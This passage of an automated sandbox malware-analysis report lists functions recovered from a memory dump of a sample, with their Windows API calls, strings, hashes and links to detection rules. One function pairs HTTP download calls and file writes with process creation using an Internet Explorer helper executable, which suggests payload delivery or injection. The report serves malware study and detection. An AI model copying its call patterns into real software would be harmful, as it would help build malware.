                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process$CopyFileHeaplstrcat$AllocateCloseHandleOpenSystemTerminateTimelstrlenmemsetwsprintf
                                      • String ID:
                                      • API String ID: 1739585374-0
                                      • Opcode ID: e9936d8bd5ad586065688de1f68c94e9cb22ef9fad24aa3c85658e74526a190c
                                      • Instruction ID: c76e153d2313420b32638f7236cca9208619d6461cd4ed7be8e4d99548e5a4b7
                                      • Opcode Fuzzy Hash: e9936d8bd5ad586065688de1f68c94e9cb22ef9fad24aa3c85658e74526a190c
                                      • Instruction Fuzzy Hash: BD91067192010D6BDB45FBB0DE56DFEB378AE54780F404138F60676291EF60AA68CF61
                                      Function 0030A300 Relevance: 7.6, APIs: 5, Instructions: 116timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,00000000,?,?,?,0030BE47,?,?), ref: 0030A349
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0030BE47,?,?), ref: 0030A376
                                      • GetLocalTime.KERNEL32(?,?,?,?,0030BE47,?,?), ref: 0030A3AC
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0030BE47,?,?), ref: 0030A3BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A3F2
                                        • Part of subcall function 00309D90: GetFileInformationByHandle.KERNEL32(?,?,?), ref: 00309D9F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 89576305-0
                                      • Opcode ID: 9b6e03711110aebd3583aa2862a7923cf977f531d4d48d8fb26b2af522de4ed8
                                      • Instruction ID: 28c43230083aff1829b9ee1867ae2dadfb6606eecffbf61d24f4d1c933d8582f
                                      • Opcode Fuzzy Hash: 9b6e03711110aebd3583aa2862a7923cf977f531d4d48d8fb26b2af522de4ed8
                                      • Instruction Fuzzy Hash: 804163B5500B04AFD725DF79D840AABBBF8FB48310F008A1EE99AC6690E770A544CB60
                                      Function 00300F20 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: eeb16c0882eb163ebcdff1d83f03519134a6e69277c8b8c605ee9354802bff50
                                      • Instruction ID: b5d7fd7737264755e84268a5cca0f4074cbf2a2f02c87e26863517f1decbffdf
                                      • Opcode Fuzzy Hash: eeb16c0882eb163ebcdff1d83f03519134a6e69277c8b8c605ee9354802bff50
                                      • Instruction Fuzzy Hash: 38F096732041196FEB204F5DEC48DA7BBACEFD9368B054125F91887341C770AC1686A1
                                      Function 0030E500 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0030E50C
                                        • Part of subcall function 0030DA31: __getptd_noexit.LIBCMT ref: 0030DA34
                                        • Part of subcall function 0030DA31: __amsg_exit.LIBCMT ref: 0030DA41
                                      • __getptd.LIBCMT ref: 0030E523
                                      • __amsg_exit.LIBCMT ref: 0030E531
                                      • __lock.LIBCMT ref: 0030E541
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0030E555
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 59c93aafb7bf661fc9be09fbe0fa019536ea9202ee73b68b4ba65401b6fe0d72
                                      • Instruction ID: ad7b001d08e7ba044240fd36d355d18e45dadf45592841814794733e04c94186
                                      • Opcode Fuzzy Hash: 59c93aafb7bf661fc9be09fbe0fa019536ea9202ee73b68b4ba65401b6fe0d72
                                      • Instruction Fuzzy Hash: F2F0F032B437009AD623BBB8A823B9D37A06F04324F114A09F814AF2C2DB6499418A69
                                      Function 00301720 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F43E0: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F441C
                                        • Part of subcall function 002F43E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F4423
                                        • Part of subcall function 002F43E0: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F4442
                                        • Part of subcall function 002F43E0: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F445A
                                        • Part of subcall function 002F43E0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F4482
                                        • Part of subcall function 002F43E0: HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F44BC
                                        • Part of subcall function 002F43E0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F44E0
                                        • Part of subcall function 002F43E0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F44EF
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00301280: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00302B26,?), ref: 003012A0
                                      • memset.MSVCRT ref: 00301821
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00313418,?,?), ref: 00301884
                                      Strings
                                      • .exe, xrefs: 0030176C
                                      • C:\Program Files (x86)\Internet Explorer\ielowutil.exe, xrefs: 003018D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTimelstrlenmemset
                                      • String ID: .exe$C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                      • API String ID: 1306395318-2544896153
                                      • Opcode ID: 4822cf9ee542fc90070a472039b907a37f2688dedc05bffae7729ef961ed3c70
                                      • Instruction ID: 55b73a4b92e4c62ee93f627015f68bde05d9e54a31288667e567a55acaec2144
                                      • Opcode Fuzzy Hash: 4822cf9ee542fc90070a472039b907a37f2688dedc05bffae7729ef961ed3c70
                                      • Instruction Fuzzy Hash: 4651537192010C6ADB59FBB0DD66EFDB378AF54780F404139FA0166291EE70AA58CF60
                                      Function 002FD8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD91C
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD936
                                      • memcpy.MSVCRT(?,?,?), ref: 002FD98C
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD719
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD73A
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD755
                                        • Part of subcall function 002FD700: memcpy.MSVCRT(?,?,?), ref: 002FD7BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                      • String ID: string too long
                                      • API String ID: 2304785028-2556327735
                                      • Opcode ID: 780309356e44994e79641b5e47f01ba333561aec0ac3aaedbfc38c0eb9e4ecda
                                      • Instruction ID: 56787d718492e22ba16ac02d65d1463549b8c03d15ae407e311b27c70fc9c033
                                      • Opcode Fuzzy Hash: 780309356e44994e79641b5e47f01ba333561aec0ac3aaedbfc38c0eb9e4ecda
                                      • Instruction Fuzzy Hash: 7431D7323201184BD7249E9CD480A7EF7EFEFD5BA0760493EE6968B681C7B19C548790
                                      Function 003002C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00300300
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00300307
                                      • wsprintfA.USER32 ref: 00300317
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 92f3644ef977f1a746c15a362016a683411b8742478ed648f067387b34270d9c
                                      • Instruction ID: c6b0e74bdb8eed61461ccfd88dbffe60ed9961046c765fc6321eb7dad5ba3fdc
                                      • Opcode Fuzzy Hash: 92f3644ef977f1a746c15a362016a683411b8742478ed648f067387b34270d9c
                                      • Instruction Fuzzy Hash: 41F068327413147BF62027B46C0EF9A7B9CEF56B91F080521F705D71D0C7A1580657A5
                                      Function 00301280 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00302B26,?), ref: 003012A0
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00302B26,?), ref: 003012CB
                                      • CloseHandle.KERNEL32(00000000,?,?,00302B26,?), ref: 003012D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
